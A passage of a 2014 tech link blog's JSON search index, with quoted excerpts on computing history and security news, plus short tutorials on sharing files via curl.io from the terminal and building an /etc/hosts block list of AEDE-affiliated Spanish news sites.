theorists often invented a concept and used it in a narrow way, while later it was rediscovered and made a general notion.\n» Dick Lipton | rjlipton.wordpress.com\n","permalink":"http://karpoke.ignaciocano.com/2014/09/09/who-invented-pointers-amortized-complexity-and-more/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAndrey Kolmogorov, Fred Hennie, Richard Stearns, and Walter Savitch\nare all famous separately; but they have something in common. Read on,\nand see. Today I wish to discuss some algorithmic tricks and show that\nthey were initially used by complexity theorists, years before they\nwere used by algorithm designers. To steal a phrase: it`s\ncomputational complexity all the way down. Well not exactly. The\nsituation is slightly more complex”a bad pun. The complexity theorists\noften invented a concept and used it in a narrow way, while later it\nwas rediscovered and made a general notion.\u003c/p\u003e","title":"Who invented pointers, amortized complexity, and more?"},{"content":" Ese día, la programadora Grace Hopper se encontraba trabajando con un Mark II en la Universidad de Harvard: el ordenador dejó de funcionar, y los ingenieros encontraron una polilla enganchada a uno de los relés del ordenador. El bicho pasó a la historia de la informática, porque pegaron sus restos en el libro de registro del ordenador, junto a una nota que decía ’First actual case of bug being found’.\n» ztfnews.wordpress.com\n","permalink":"http://karpoke.ignaciocano.com/2014/09/09/el-primer-bug/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEse día, la programadora Grace Hopper se encontraba trabajando con un\nMark II en la Universidad de Harvard: el ordenador dejó de funcionar,\ny los ingenieros encontraron una polilla enganchada a uno de los relés\ndel ordenador. El bicho pasó a la historia de la informática, porque\npegaron sus restos en el libro de registro del ordenador, junto a una\nnota que decía ’First actual case of bug being found’.\u003c/p\u003e","title":"El primer ’bug’"},{"content":" Like many others, I spend most of my day behind a computer. In order make the most of it (and to keep my body from complaining too much), I try to maintain an optimized setup. For example, I code in Vim, browse with Vimperator, and move windows around in i3. Another common task is filesystem navigation. I prefer to use the command-line for this, but typing cd ~/some/very/deep/often-used/directory over and over again does become cumbersome.\n» Jeroen Janssens | jeroenjanssens.com\n","permalink":"http://karpoke.ignaciocano.com/2014/09/07/quickly-navigate-your-filesystem-from-the-command-line/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLike many others, I spend most of my day behind a computer. In order\nmake the most of it (and to keep my body from complaining too much), I\ntry to maintain an optimized setup. For example, I code in Vim, browse\nwith Vimperator, and move windows around in i3. Another common task is\nfilesystem navigation. I prefer to use the command-line for this, but\ntyping cd ~/some/very/deep/often-used/directory over and over again\ndoes become cumbersome.\u003c/p\u003e","title":"Quickly navigate your filesystem from the command-line"},{"content":"Hay muchas maneras de compartir archivos, pero con curl.io podemos hacerlo directamente desde el terminal usando curl, permitiéndonos archivos hasta 5 GB y durante 4 horas, tiempo tras el cual será eliminados.\nPor ejemplo, para compartir el archivo /tmp/test:\n$ curl -F \u0026#34;file=@/tmp/test\u0026#34; http://curl.io/send/nzdqxcmf File successfully received. You can download test from this url: http://curl.io/get/nzdqxcmf/90571b24cf847434a171d41cb2043d6a561cb85b Para recuperarlo:\n$ curl -o test http://curl.io/get/nzdqxcmf/90571b24cf847434a171d41cb2043d6a561cb85b Tal como nos sugieren en su web, también podemos enviarlo cifrado con gpg:\n$ gpg -c \u0026#34;/tmp/test\u0026#34; \u0026amp;\u0026amp; curl -F \u0026#34;file=@/tmp/test.gpg\u0026#34; http://curl.io/send/nzdqxcmf Para recuperarlo y descifrarlo:\ncurl http://curl.io/get/nzdqxcmf/90571b24cf847434a171d41cb2043d6a561cb85b | gpg -o test Absolutamente todo desde el terminal El hecho de poder compartir archivos en la nube desde el terminal está muy bien, pero no deja de ser un engorro tener que recurrir al navegador para poder obtener la URL de envío. Descargar el código fuente de la página no nos sirve porque la URL se genera por javascript y en la web se comprueba que el código de la URL sea válido (no sirve enviar cualquier cosa, aunque sí parece que se pueden reutilizar URLs válidas).\nAfortunadamente, podemos utilizar phantomjs. Mediante el siguiente script, curlio.js, podremos obtener una URL de envío válida:\nvar page = require(\u0026#39;webpage\u0026#39;).create(), address = \u0026#34;http://curl.io\u0026#34;; page.open(address, function(status) { if (status !== \u0026#39;success\u0026#39;) { console.log(\u0026#39;Error loading address\u0026#39;); } else { var url = page.evaluate(function() { return document.getElementsByClassName(\u0026#39;command\u0026#39;)[0].innerHTML.replace(/^.*/, \u0026#34;\u0026#34;); }); console.log(url); } phantom.exit(); }); Un ejemplo de uso:\n$ phantomjs curlio.js http://curl.io/send/fgmnwl2e ","permalink":"http://karpoke.ignaciocano.com/2014/09/06/compartiendo-archivos-en-la-nube-desde-el-terminal/","summary":"\u003cp\u003eHay muchas maneras de compartir archivos, pero con \u003ca href=\"http://curl.io/\"\u003ecurl.io\u003c/a\u003e podemos\nhacerlo directamente desde el terminal usando \u003ccode\u003ecurl\u003c/code\u003e, permitiéndonos\narchivos hasta 5 GB y durante 4 horas, tiempo tras el cual será\neliminados.\u003c/p\u003e\n\u003cp\u003ePor ejemplo, para compartir el archivo \u003ccode\u003e/tmp/test\u003c/code\u003e:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ curl -F \u0026#34;file=@/tmp/test\u0026#34; http://curl.io/send/nzdqxcmf\nFile successfully received.\nYou can download test from this url:\nhttp://curl.io/get/nzdqxcmf/90571b24cf847434a171d41cb2043d6a561cb85b\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003ePara recuperarlo:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ curl -o test http://curl.io/get/nzdqxcmf/90571b24cf847434a171d41cb2043d6a561cb85b\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eTal como nos sugieren en su web, también podemos enviarlo cifrado con\n\u003ccode\u003egpg\u003c/code\u003e:\u003c/p\u003e","title":"Compartiendo archivos en la nube desde el terminal"},{"content":" For those less familiar with the story and the theories, I thought it might be interesting and useful to have a single thread that lists all of the theories that have arisen given the various questions and unknowns surrounding the Song. There are a lot of brilliant people on these boards and some of them have come up with truly excellent theories, right or wrong, to answer those thoughts we have.\n» asoiaf.westeros.org\n","permalink":"http://karpoke.ignaciocano.com/2014/09/06/game-of-thrones-a-compendium-of-theories/","summary":"\u003cblockquote\u003e\n\u003cp\u003eFor those less familiar with the story and the theories, I thought it\nmight be interesting and useful to have a single thread that lists all\nof the theories that have arisen given the various questions and\nunknowns surrounding the Song. There are a lot of brilliant people on\nthese boards and some of them have come up with truly excellent\ntheories, right or wrong, to answer those thoughts we have.\u003c/p\u003e","title":"Game of thrones: A Compendium of Theories"},{"content":" Los unos y los ceros llevan milenios entre nosotros, desde algunas culturas primitivas, pero las bombillas se han ido encendiendo poco a poco hasta llegar a su actual omnipresencia en la electrónica. Primero fueron Leibniz y la aritmética, luego Boole y la lógica, y finalmente Shannon y su idea de utilizar el álgebra de Boole para simplificar los circuitos. Una historia apasionante hasta llegar a nuestro smartphone.\n» David G. Ortiz | blogthinkbig.com\n","permalink":"http://karpoke.ignaciocano.com/2014/09/06/sistema-binario-unos-y-ceros-a-traves-de-la-historia/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLos unos y los ceros llevan milenios entre nosotros, desde algunas\nculturas primitivas, pero las bombillas se han ido encendiendo poco a\npoco hasta llegar a su actual omnipresencia en la electrónica. Primero\nfueron Leibniz y la aritmética, luego Boole y la lógica, y finalmente\nShannon y su idea de utilizar el álgebra de Boole para simplificar los\ncircuitos. Una historia apasionante hasta llegar a nuestro smartphone.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» David G. Ortiz | \u003ca href=\"http://blogthinkbig.com/sistema-binario/\"\u003eblogthinkbig.com\u003c/a\u003e\u003c/p\u003e","title":"Sistema binario: unos y ceros a través de la historia"},{"content":" Vivimos en una era de ’ciberguerras’, intrusiones en línea e inseguridad informática, pero también en una época de libertad de acceso a cantidades ingentes de datos e información sin precedentes, de acceso casi ilimitado al conocimiento. No es posible explicar semejante paradoja sin asomarse la historia del ’hacking’ y, aunque parezca mentira, en España esa historia es apasionante. » hackstory.es\n» Pablo Romero | elmundo.es\n","permalink":"http://karpoke.ignaciocano.com/2014/09/05/erase-una-vez-unos-hackers-hispanos/","summary":"\u003cblockquote\u003e\n\u003cp\u003eVivimos en una era de ’ciberguerras’, intrusiones en línea e\ninseguridad informática, pero también en una época de libertad de\nacceso a cantidades ingentes de datos e información sin precedentes,\nde acceso casi ilimitado al conocimiento. No es posible explicar\nsemejante paradoja sin asomarse la historia del ’hacking’ y, aunque\nparezca mentira, en España esa historia es apasionante. »\n\u003ca href=\"http://hackstory.es/\"\u003ehackstory.es\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Pablo Romero | \u003ca href=\"http://www.elmundo.es/tecnologia/2014/08/29/53ff4ce4e2704eb34f8b4588.html\"\u003eelmundo.es\u003c/a\u003e\u003c/p\u003e","title":"Érase una vez unos ’hackers’ hispanos..."},{"content":" We’re happy to announce that fail0verflow, GTVHacker, and Team-Eureka have jointly discovered and exploited a new vulnerability in the Chromecast which allows root access on the current software build (17977) as well as new in box devices\n» Team-Eureka | xda-developers.com\n","permalink":"http://karpoke.ignaciocano.com/2014/08/31/hubcap-chromecast-root-release/","summary":"\u003cblockquote\u003e\n\u003cp\u003eWe’re happy to announce that fail0verflow, GTVHacker, and Team-Eureka\nhave jointly discovered and exploited a new vulnerability in the\nChromecast which allows root access on the current software build\n(17977) as well as new in box devices\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Team-Eureka | \u003ca href=\"http://forum.xda-developers.com/hardware-hacking/chromecast/root-hubcap-chromecast-root-release-t2855893\"\u003exda-developers.com\u003c/a\u003e\u003c/p\u003e","title":"HubCap Chromecast Root Release"},{"content":" So, what is systemd? Well, meet your new God. You may have been praying at the alter of simplicity, but your religion is being deprecated. It likely already happened without your knowledge during an upgrade of your Linux box. systemd is the all knowing, all controlling meta-deity that sees all and supervises all. It’s the new One Master Process that aspires to control everything it can - and it’s already doing a lot. It’s what init would look like if it were a transformer on steroids. It’s complicated, multi-faceted, opaque, and supremely powerful.\n» Christopher Barry | lkml.org\n","permalink":"http://karpoke.ignaciocano.com/2014/08/31/open-letter-to-the-linux-world/","summary":"\u003cblockquote\u003e\n\u003cp\u003eSo, what is systemd? Well, meet your new God. You may have been\npraying at the alter of simplicity, but your religion is being\ndeprecated. It likely already happened without your knowledge during\nan upgrade of your Linux box. systemd is the all knowing, all\ncontrolling meta-deity that sees all and supervises all. It’s the new\nOne Master Process that aspires to control everything it can - and\nit’s already doing a lot. It’s what init would look like if it were a\ntransformer on steroids. It’s complicated, multi-faceted, opaque, and\nsupremely powerful.\u003c/p\u003e","title":"Open letter to the Linux World"},{"content":" The attack exploits weak randomization, or the lack of randomization, in a key used to authenticate hardware PINs on some implementations of Wi-Fi Protected Setup, allowing anyone to quickly collect enough information to guess the PIN using offline calculations. By calculating the correct PIN, rather than attempting to brute-force guess the numerical password, the new attack circumvents defenses instituted by companies. » Offline bruteforce attack on WiFi Protected Setup » Hands-on: hacking WiFi Protected Setup with Reaver\u0026lt; /a\u0026gt;\n» Robert Lemos | arstechnica.com/a\u0026gt;\n","permalink":"http://karpoke.ignaciocano.com/2014/08/30/offline-attack-shows-wi-fi-routers-still-vulnerable/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe attack exploits weak randomization, or the lack of randomization,\nin a key used to authenticate hardware PINs on some implementations of\nWi-Fi Protected Setup, allowing anyone to quickly collect enough\ninformation to guess the PIN using offline calculations. By\ncalculating the correct PIN, rather than attempting to brute-force\nguess the numerical password, the new attack circumvents defenses\ninstituted by companies. » \u003ca href=\"http://www.slideshare.net/0xcite/offline-bruteforce-attack-on-wifi-protected-setup\"\u003eOffline bruteforce attack on WiFi\nProtected Setup\u003c/a\u003e » \u003ca href=\"http://arstechnica.com/business/2012/01/hands-on-hacking-wifi-protected-setup-with-reaver/\"\u003eHands-on: hacking WiFi Protected Setup with\nReaver\u0026lt; /a\u0026gt;\u003c/a\u003e\u003c/p\u003e","title":"Offline attack shows Wi-Fi routers still vulnerable"},{"content":" Last fall, we let you know that Caltech and The Feynman Lectures Website joined forces to create an online edition of The Feynman Lectures on Physics. They started with Volume 1. And now they’ve followed up with Volume 2 and Volume 3, making the collection complete. » The Feynman Lectures on Physics, Volume I » | The Feynman Lectures on Physics, Volume II » The Feynman Lectures on Physics, Volume III » Free textbooks » | Free ebooks\n» openculture.com\n","permalink":"http://karpoke.ignaciocano.com/2014/08/30/the-feynman-lectures-on-physics-completely-online/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLast fall, we let you know that Caltech and The Feynman Lectures\nWebsite joined forces to create an online edition of The Feynman\nLectures on Physics. They started with Volume 1. And now they’ve\nfollowed up with Volume 2 and Volume 3, making the collection\ncomplete. » \u003ca href=\"http://www.feynmanlectures.caltech.edu/I_toc.html\"\u003eThe Feynman Lectures on Physics, Volume I\u003c/a\u003e » | \u003ca href=\"http://www.feynmanlectures.caltech.edu/II_toc.html\"\u003eThe\nFeynman Lectures on Physics, Volume II\u003c/a\u003e » \u003ca href=\"http://www.feynmanlectures.caltech.edu/III_toc.html\"\u003eThe Feynman Lectures on\nPhysics, Volume III\u003c/a\u003e » \u003ca href=\"http://www.openculture.com/free_textbooks\"\u003eFree textbooks\u003c/a\u003e » | \u003ca href=\"http://www.openculture.com/free_ebooks\"\u003eFree ebooks\u003c/a\u003e\u003c/p\u003e","title":"The Feynman Lectures on Physics, completely online"},{"content":" Apps that use your smartphone’s microphone need to ask permission, but the motion sensors? No say-so needed. That might not sound like a big deal, but security researchers from Stanford University and defense firm Rafael have discovered a way to turn Android phone gyroscopes into crude microphones. They call their app ”Gyrophone” and here’s how it works: the tiny gyros in your phone that measure orientation do so using vibrating pressure plates. As it turns out, they can also pick up air vibrations from sounds, and many Android devices can do it in the 80 to 250 hertz range \u0026ndash; exactly the frequency of a human voice.\n» Steve Dent | engadget.com\n","permalink":"http://karpoke.ignaciocano.com/2014/08/16/hackers-transform-a-smartphone-gyroscope-into-an-always-on-microphone/","summary":"\u003cblockquote\u003e\n\u003cp\u003eApps that use your smartphone’s microphone need to ask permission, but\nthe motion sensors? No say-so needed. That might not sound like a big\ndeal, but security researchers from Stanford University and defense\nfirm Rafael have discovered a way to turn Android phone gyroscopes\ninto crude microphones. They call their app ”Gyrophone” and here’s how\nit works: the tiny gyros in your phone that measure orientation do so\nusing vibrating pressure plates. As it turns out, they can also pick\nup air vibrations from sounds, and many Android devices can do it in\nthe 80 to 250 hertz range \u0026ndash; exactly the frequency of a human voice.\u003c/p\u003e","title":"Hackers transform a smartphone gyroscope into an always-on microphone"},{"content":" You can’t trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. In demonstrating the possibility of this kind of attack, I picked on the C compiler. I could have picked on any program-handling program such as an assembler, a loader, or even hardware microcode. As the level of program gets lower, these bugs will be harder and harder to detect. A well installed microcode bug will be almost impossible to detect.\n» Ken Thompson | bell-labs.com\n","permalink":"http://karpoke.ignaciocano.com/2014/08/15/reflections-on-trusting-trust/","summary":"\u003cblockquote\u003e\n\u003cp\u003eYou can’t trust code that you did not totally create yourself.\n(Especially code from companies that employ people like me.) No amount\nof source-level verification or scrutiny will protect you from using\nuntrusted code. In demonstrating the possibility of this kind of\nattack, I picked on the C compiler. I could have picked on any\nprogram-handling program such as an assembler, a loader, or even\nhardware microcode. As the level of program gets lower, these bugs\nwill be harder and harder to detect. A well installed microcode bug\nwill be almost impossible to detect.\u003c/p\u003e","title":"Reflections on Trusting Trust"},{"content":" The tenth man. If nine of us look at the same information and arrive at the exact same conclusion, it’s the duty of the tenth man to disagree. No matter how improbable it may seem, the tenth man has to start thinking with the assumption that the other nine are wrong.\n» MG Siegler | techcrunch.com\n","permalink":"http://karpoke.ignaciocano.com/2014/08/07/the-vp-of-devils-advocacy/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe tenth man. If nine of us look at the same information and arrive\nat the exact same conclusion, it’s the duty of the tenth man to\ndisagree. No matter how improbable it may seem, the tenth man has to\nstart thinking with the assumption that the other nine are wrong.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» MG Siegler | \u003ca href=\"http://techcrunch.com/2014/07/27/the-vp-of-devils-advocacy/\"\u003etechcrunch.com\u003c/a\u003e\u003c/p\u003e","title":"The VP of Devil’s Advocacy"},{"content":" That’s the takeaway from findings security researchers Karsten Nohl and Jakob Lell plan to present next week, demonstrating a collection of proof-of-concept malicious software that highlights how the security of USB devices has long been fundamentally broken. The malware they created, called BadUSB, can be installed on a USB device to completely take over a PC, invisibly alter files installed from the memory stick, or even redirect the user’s internet traffic. Because BadUSB resides not in the flash memory storage of USB devices, but in the firmware that controls their basic functions, the attack code can remain hidden long after the contents of the device’s memory would appear to the average user to be deleted. And the two researchers say there’s no easy fix: The kind of compromise they’re demonstrating is nearly impossible to counter without banning the sharing of USB devices or filling your port with superglue.\n» Andy Greenberg | wired.com\n","permalink":"http://karpoke.ignaciocano.com/2014/08/02/why-the-security-of-usb-is-fundamentally-broken/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThat’s the takeaway from findings security researchers Karsten Nohl\nand Jakob Lell plan to present next week, demonstrating a collection\nof proof-of-concept malicious software that highlights how the\nsecurity of USB devices has long been fundamentally broken. The\nmalware they created, called BadUSB, can be installed on a USB device\nto completely take over a PC, invisibly alter files installed from the\nmemory stick, or even redirect the user’s internet traffic. Because\nBadUSB resides not in the flash memory storage of USB devices, but in\nthe firmware that controls their basic functions, the attack code can\nremain hidden long after the contents of the device’s memory would\nappear to the average user to be deleted. And the two researchers say\nthere’s no easy fix: The kind of compromise they’re demonstrating is\nnearly impossible to counter without banning the sharing of USB\ndevices or filling your port with superglue.\u003c/p\u003e","title":"Why the Security of USB Is Fundamentally Broken"},{"content":"La lista de medios asociados a AEDE se puede consultar en su página: www.aede.es/publica/Periodicos_Asociados.asp. Si no queremos visitar ni por error las páginas de dichos medios, tenemos diferentes alternativas, desde scripts de GreaseMonkey para Firefox y complementos para Chrome, hasta añadir los dominios en el fichero /etc/hosts, tal como haríamos si fuesen dominios maliciosos, o incluso complementos para WordPress.\nLos siguientes comandos nos facilitan descargar la lista de dominios:\n$ lynx -dump http://www.aede.es/publica/Periodicos_Asociados.asp | \\grep -Eo \u0026#34;http://[^/\\\u0026#34;]+\u0026#34; | \\grep -v aede.es | sort | uniq | awk \u0026#34;{gsub(/http:\\/\\//, \\\u0026#34;\\\u0026#34;); print; gsub(/www\\./, \\\u0026#34;\\\u0026#34;); print; }\u0026#34; | sed \u0026#39;s/^/127.0.0.1 /\u0026#39; Una alternativa a lynx sería utilizar el comando curl:\n$ curl -so- http://www.aede.es/publica/Periodicos_Asociados.asp | \\grep -Eo \u0026#34;http://[^/\\\u0026#34;]+\u0026#34; | \\grep -v aede.es | sort | uniq | awk \u0026#34;{gsub(/http:\\/\\//, \\\u0026#34;\\\u0026#34;); print; gsub(/www\\./, \\\u0026#34;\\\u0026#34;); print; }\u0026#34; | sed \u0026#39;s/^/127.0.0.1 /\u0026#39; Para que la lista sea más completa, también se podrían añadir los dominios alternativos (.com, .es, etc) o dominios de otras páginas de cada grupo de prensa: http://pykiss.github.io/anti-AEDE/domains.list.\nReferencias » Los usuarios de Menéame se levantan contra los medios de AEDE\n","permalink":"http://karpoke.ignaciocano.com/2014/07/27/conseguir-la-lista-actualizada-de-medios-aede-para-bloquearlos/","summary":"\u003cp\u003eLa lista de medios asociados a AEDE se puede consultar en su página:\n\u003ca href=\"https://www.aede.es/publica/Periodicos_Asociados.asp\"\u003ewww.aede.es/publica/Periodicos_Asociados.asp\u003c/a\u003e. Si no queremos visitar ni\npor error las páginas de dichos medios, tenemos diferentes alternativas,\ndesde \u003cem\u003escripts\u003c/em\u003e de GreaseMonkey para \u003ca href=\"https://github.com/pykiss/anti-AEDE/blob/master/script.user.js\"\u003eFirefox\u003c/a\u003e y complementos para\n\u003ca href=\"https://chrome.google.com/webstore/detail/aede-blocker/olfbaiingdbeoihdemklgmakblhcgpmn?hl=es\"\u003eChrome\u003c/a\u003e, hasta \u003ca href=\"http://anotacionsalmarge.wordpress.com/2014/02/17/bloquejar-pagines-web/\"\u003eañadir los dominios en el fichero \u003ccode\u003e/etc/hosts\u003c/code\u003e\u003c/a\u003e,\ntal como haríamos si fuesen \u003ca href=\"/2012/06/21/hphosts-evitando-la-navegacion-por-dominios-maliciosos/\"\u003edominios maliciosos\u003c/a\u003e, o incluso\ncomplementos para \u003ca href=\"https://wordpress.org/plugins/canon-aede/\"\u003eWordPress\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eLos siguientes comandos nos facilitan descargar la lista de dominios:\u003c/p\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003e$ lynx -dump http://www.aede.es/publica/Periodicos_Asociados.asp |\n\\grep -Eo \u0026#34;http://[^/\\\u0026#34;]+\u0026#34; |\n\\grep -v aede.es |\nsort |\nuniq |\nawk \u0026#34;{gsub(/http:\\/\\//, \\\u0026#34;\\\u0026#34;); print; gsub(/www\\./, \\\u0026#34;\\\u0026#34;); print; }\u0026#34; |\nsed \u0026#39;s/^/127.0.0.1  /\u0026#39;\n\u003c/code\u003e\u003c/pre\u003e\u003cp\u003eUna alternativa a \u003ccode\u003elynx\u003c/code\u003e sería utilizar el comando \u003ccode\u003ecurl\u003c/code\u003e:\u003c/p\u003e","title":"Conseguir la lista actualizada de medios AEDE para bloquearlos"},{"content":" Estamos tan inmersos en un mundo de electrónica, unos y ceros, que olvidamos lo recientes que son esos inventos que usamos a diario. Los primeros ordenadores personales verdaderamente relevantes nacieron a finales del siglo pasado: el Apple II (1977), el IBM PC (1981), el Commodore 64 (1982), el primer Macintosh (1984)¦ Windows nació aún más tarde, en 1985, como una extensión gráfica del sistema operativo MS-DOS.\n» David G. Ortiz | yorokobu.es\n","permalink":"http://karpoke.ignaciocano.com/2014/07/22/hacker-a-los-70-abuelos-de-la-informatica-moderna-que-aun-pican-codigo-a-diario/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEstamos tan inmersos en un mundo de electrónica, unos y ceros, que\nolvidamos lo recientes que son esos inventos que usamos a diario. Los\nprimeros ordenadores personales verdaderamente relevantes nacieron a\nfinales del siglo pasado: el Apple II (1977), el IBM PC (1981), el\nCommodore 64 (1982), el primer Macintosh (1984)¦ Windows nació aún más\ntarde, en 1985, como una extensión gráfica del sistema operativo\nMS-DOS.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» David G. Ortiz | \u003ca href=\"http://www.yorokobu.es/abuelos-informaticos/\"\u003eyorokobu.es\u003c/a\u003e\u003c/p\u003e","title":"Hacker a los 70: abuelos de la informática moderna que aún pican código a diario"},{"content":" The network of sites that make up StackExchange, which includes StackOverflow, is now ranked 54th for traffic in the world; they have 110 sites and are growing at a rate of 3 or 4 a month; 4 million users; 40 million answers; and 560 million pageviews a month. This is with just 25 servers. For everything. That’s high availability, load balancing, caching, databases, searching, and utility functions. All with a relative handful of employees. Now that’s quality engineering.\n» Todd Hoff | highscalability.com\n","permalink":"http://karpoke.ignaciocano.com/2014/07/21/stackoverflow-update-560m-pageviews-a-month-25-servers-and-its-all-about-performance/","summary":"\u003cblockquote\u003e\n\u003cp\u003eThe network of sites that make up StackExchange, which includes\nStackOverflow, is now ranked 54th for traffic in the world; they have\n110 sites and are growing at a rate of 3 or 4 a month; 4 million\nusers; 40 million answers; and 560 million pageviews a month. This is\nwith just 25 servers. For everything. That’s high availability, load\nbalancing, caching, databases, searching, and utility functions. All\nwith a relative handful of employees. Now that’s quality engineering.\u003c/p\u003e","title":"StackOverflow Update: 560M Pageviews A Month, 25 Servers, And It’s All About Performance"},{"content":" Lo mismo sucede con el término de ”seguridad nacional” ampliamente utilizado desde la aparición de los documentos de la NSA. ”El término en sí significa proteger la estabilidad de tu país dentro de tus fronteras, por tanto no hay razón para vigilar a todo un país o invadir todo un país. Lo que hacen es utilizarlo como término universal para asustar a la gente evitando que publiquen la verdad y permitiéndoles tapar sus propios actos ilegales”, y recuerda como en pro de esta seguridad nacional, la agencia de seguridad nacional britanica irrumpió el pasado agosto en la redacción del diario estadounidense The Guardian y destruyó discos duros y documentación, en un ”extraordinario acto contra la libertad de prensa”. ”Y eso pasó en un país occidental, pero era por la seguridad nacional”.\n» Silvia Font | eldiario.es\n\u0026#34;Sarah Harrison: \u0026#34;No poder negar la verdad es lo que más les aterra\u0026#34;\u0026#34; ","permalink":"http://karpoke.ignaciocano.com/2014/07/21/sarah-harrison-no-poder-negar-la-verdad-es-lo-que-mas-les-aterra/","summary":"\u003cblockquote\u003e\n\u003cp\u003eLo mismo sucede con el término de ”seguridad nacional” ampliamente\nutilizado desde la aparición de los documentos de la NSA. ”El término\nen sí significa proteger la estabilidad de tu país dentro de tus\nfronteras, por tanto no hay razón para vigilar a todo un país o\ninvadir todo un país. Lo que hacen es utilizarlo como término\nuniversal para asustar a la gente evitando que publiquen la verdad y\npermitiéndoles tapar sus propios actos ilegales”, y recuerda como en\npro de esta seguridad nacional, la agencia de seguridad nacional\nbritanica irrumpió el pasado agosto en la redacción del diario\nestadounidense The Guardian y destruyó discos duros y documentación,\nen un ”extraordinario acto contra la libertad de prensa”. ”Y eso pasó\nen un país occidental, pero era por la seguridad nacional”.\u003c/p\u003e","title":"Sarah Harrison: ”No poder negar la verdad es lo que más les aterra”"},{"content":" El canon AEDE se aprobaría el martes 22 de julio y sus implicaciones son mucho más grandes de lo que parece. Tasar el derecho a cita y legalizar medidas que atentan contra la libertad de expresión en internet. En este caso, la víctima eres tú.\n» Eduardo Arcos | alt1040.com\n","permalink":"http://karpoke.ignaciocano.com/2014/07/21/el-gobierno-de-espana-esta-librando-una-guerra-en-contra-del-internet-y-tu-eres-la-victima/","summary":"\u003cblockquote\u003e\n\u003cp\u003eEl canon AEDE se aprobaría el martes 22 de julio y sus implicaciones\nson mucho más grandes de lo que parece. Tasar el derecho a cita y\nlegalizar medidas que atentan contra la libertad de expresión en\ninternet. En este caso, la víctima eres tú.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e» Eduardo Arcos | \u003ca href=\"http://alt1040.com/2014/07/canon-aede-espana-vs-internet\"\u003ealt1040.com\u003c/a\u003e\u003c/p\u003e","title":"El Gobierno de España está librando una guerra en contra del internet y tú eres la víctima"},{"content":" Algorithms are a fascinating use case for visualization. To visualize an algorithm, we don’t merely fit data to a chart; there is no primary dataset. Instead there are logical rules that describe behavior. This may be why algorithm visualizations are so unusual, as designers experiment with novel forms to better communicate. This is reason enough to study them. But algorithms are also a reminder that visualization is more than a tool for finding patterns in data. Visualization leverages the human visual system to augment human intellect: we can use it to better understand these important abstract processes, and perhaps other things, too.\n» Mike Bostock | bost.ocks.org\n","permalink":"http://karpoke.ignaciocano.com/2014/06/29/visualizing-algorithms/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAlgorithms are a fascinating use case for visualization. To visualize\nan algorithm, we don’t merely fit data to a chart; there is no primary\ndataset. Instead there are logical rules that describe behavior. This\nmay be why algorithm visualizations are so unusual, as designers\nexperiment with novel forms to better communicate. This is reason\nenough to study them. But algorithms are also a reminder that\nvisualization is more than a tool for finding patterns in data.\nVisualization leverages the human visual system to augment human\nintellect: we can use it to better understand these important abstract\nprocesses, and perhaps other things, too.\u003c/p\u003e","title":"Visualizing Algorithms"},{"content":"Related:\nAndroid has been with us in one form or another for more than six years. During that time, we’ve seen an absolutely breathtaking rate of change unlike any other development cycle that has ever existed. When it came time for Google to dive in to the smartphone wars, the company took its rapid-iteration, Web-style update cycle and applied it to an operating system, and the result has been an onslaught of continual improvement. Lately, Android has even been running on a previously unheard of six-month development cycle, and that’s slower than it used to be. For the first year of Android’s commercial existence, Google was putting out a new version every two-and-a-half months.\n» Ron Amadeo | arstechnica.com\n","permalink":"http://karpoke.ignaciocano.com/2014/06/17/the-history-of-android-the-endless-iterations-of-googles-mobile-os/","summary":"\u003cp\u003eRelated:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eAndroid has been with us in one form or another for more than six\nyears. During that time, we’ve seen an absolutely breathtaking rate of\nchange unlike any other development cycle that has ever existed. When\nit came time for Google to dive in to the smartphone wars, the company\ntook its rapid-iteration, Web-style update cycle and applied it to an\noperating system, and the result has been an onslaught of continual\nimprovement. Lately, Android has even been running on a previously\nunheard of six-month development cycle, and that’s slower than it used\nto be. For the first year of Android’s commercial existence, Google\nwas putting out a new version every two-and-a-half months.\u003c/p\u003e","title":"The history of Android: The endless iterations of Google’s mobile OS"},{"content":" Abres WhatsApp cada diez minutos y, sin embargo, nunca has reparado en la historia fascinante que esconden tres de sus emoticonos más populares. Están en la categoría de smileys, justo debajo de la fila de expresivos gatitos amarillos, flanqueados por la máscara del lengendario Tengu nipón y una imponente calavera. A primera vista, son solo tres simpáticos y expresivos monos que dan mucho juego en las conversaciones, pero las apariencias engañan: detrás hay tradición, misterio y un lejano mito oriental.\n» David G. Ortiz | yorokobu.es\n","permalink":"http://karpoke.ignaciocano.com/2014/06/15/los-tres-monos-sabios-de-whatsapp/","summary":"\u003cblockquote\u003e\n\u003cp\u003eAbres WhatsApp cada diez minutos y, sin embargo, nunca has reparado en\nla historia fascinante que esconden tres de sus emoticonos más\npopulares. Están en la categoría de smileys, justo debajo de la fila\nde expresivos gatitos amarillos, flanqueados por la máscara del\nlengendario Tengu nipón y una imponente calavera. A primera vista, son\nsolo tres simpáticos y expresivos monos que dan mucho juego en las\nconversaciones, pero las apariencias engañan: detrás hay tradición,\nmisterio y un lejano mito oriental.\u003c/p\u003e","title":"Los tres monos sabios de WhatsApp"},{"content":" En la primavera de 1978 mientras que Dan Bricklin se sentaba en una de las clases del Máster que se estaba sacando en la Escuela de Empresariales de 